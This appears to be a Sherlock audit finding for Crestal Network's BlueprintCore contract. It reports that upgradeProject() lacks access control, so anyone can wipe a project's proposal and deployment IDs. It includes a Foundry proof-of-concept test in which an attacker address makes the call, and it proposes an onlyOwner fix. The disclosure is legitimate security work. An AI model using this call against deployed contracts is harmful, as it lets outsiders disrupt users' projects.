Active Cloth Tortoise

Medium

# An attacker can call `upgradeProject()` and reset the `requestProposalID` to 0 enabling calling again `proposalRequest()`

### Summary

The `upgradeProject()` function has no access control and allows resetting the following fields to zero: 
`requestProposalID`, `requestDeploymentID`, `proposedSolverAddr`. 

The internal function `proposalRequest()` uses the `requestProposalID` to verify that the project has no active `requestProposalID`. 

By calling `upgradeProject()` an attacker can overwrite the `projects[projectId].requestProposalID`. 

### Root Cause

The function `upgradeProject()` has no access control:

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198C14-L198C28


### Internal Pre-conditions

1. A user creates an agent or a project with any function like `createProjectIDAndProposalRequest()` or `createAgentWithToken()`. 
2. This creates a project with a `projectId`, 

### External Pre-conditions

-

### Attack Path

Any attacker can call `upgradeProject()` at any time. 

### Impact

The `requestProposalID`, `requestDeploymentID` and `proposedSolverAddr` are erased and set to 0.

### PoC

Add this test to the end of `test/BlueprintV5.t.sol`

```solidity
    function test_upgradeProject() public {
        address attacker = makeAddr("attacker");

        blueprint.addPaymentAddress(address(mockToken));
        // Mint tokens to the test account
        uint256 validTokenAmount = 100 * 10 ** 18;
        // set none zero cost for create agents, use any number greater than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);
        mockToken.mint(address(this), validTokenAmount);
        // Approve the blueprint contract to spend tokens directly from the test contract
        mockToken.approve(address(blueprint), validTokenAmount);

        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
        projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2981);
        // create agent with token and non zero cost
        blueprint.createAgentWithToken(projectId, base64Proposal, workerAddress, serverURL, address(mockToken));
        
        vm.prank(attacker);
        blueprint.upgradeProject(projectId);
        
        // proposalId has been wiped out
        (, bytes32 requestProposalId, ) = blueprint.getProjectInfo(projectId);
        assertEq(requestProposalId, bytes32(0));   
    }
```


### Mitigation

Only admin should be allowed to upgrade a project. 

```diff
    function upgradeProject(bytes32 projectId) public hasProject(projectId) onlyOwner {
        // reset project info
        projects[projectId].requestProposalID = 0;
        projects[projectId].requestDeploymentID = 0;
        projects[projectId].proposedSolverAddr = dummyAddress;
    }
```
